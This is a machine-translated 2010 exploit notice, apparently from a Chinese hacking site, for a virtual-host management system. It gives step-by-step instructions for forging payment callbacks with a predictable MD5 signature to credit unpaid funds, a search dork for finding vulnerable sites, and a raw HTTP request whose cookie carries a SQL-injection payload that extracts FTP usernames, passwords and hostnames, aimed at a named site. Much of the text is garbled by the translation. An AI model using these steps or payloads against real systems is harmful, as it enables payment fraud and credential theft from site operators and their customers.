Star outside the virtual host management system brush money vulnerability+injection vulnerability-vulnerability warning-the black bar safety net

2010-07-05T00:00:00
ID MYHACK58:62201027480
Type myhack58
Reporter 佚名
Modified 2010-07-05T00:00:00

Description

Test station: http://www.. com/* Register for an account, for example: test Visit: http://www.. com/netpay/ips/* Enter your username and amount of recharge. For example: test 1 $ 0 Point the next step will be to generate you an order number. Such as 7 2 2 9 7 8 Remember it

Parameter structure:

billno=order number&amount=recharge amount&date=Date&succ=Y&signature=md5 values

Copy the code Date = current date The amount of recharge = the order number on the amount of

Added to the actual value: billno=7 2 2 9 7 8&amount=5&date=2 0 1 0 0 6 1 3&succ=Y&signature=990a56c327f4b60d0c4d94a880f728ec

md5 value=md5(billno&amount&date&succ)

Here is a demo of the actual md5 value of: md5(722978520100613Y)=990a56c327f4b60d0c4d94a880f728ec

Submit url http://www.xx.com/netpay/ips/receive.asp?billno=722978&amount=5&date=2 0 1 0 0 6 1 3&succ=Y&signature=990a56c327f4b60d0c4d94a880f728ec

So 5 bucks came. Give you a keyword: inurl: (netpay/alipay)

Injection vulnerability

POST /netpay/allbuy/receive. asp? amount=1&success=Y&sign=d3d9df7301929c5684fb52c267186b21 HTTP/1.1

Cookie: billno=1'%20or%2 0 0% 3c and%3e(select%20top%2 0 1%20ftpname%2bchar(1 2 4)%2bftppassword%2bchar(1 2 4)%2bhostname%20from%20FreeHost. FreeHost_Product_Host%20where%20id%20not%20in(select%20top%2 0 0%20id%20from%20FreeHost. FreeHost_Product_Host%20order%20by%20id)%20order%20by%20id)%3b--

Content-Type: application/x-www-form-urlencoded

Referer: http://www.9c2c.com/netpay/allbuy/receive.asp?amount=1&success=Y&sign=d3d9df7301929c5684fb52c267186b21

Host: www.9c2c.com

Content-Length: 7

Expect: 1 0 0-continue

Connection: Keep-Alive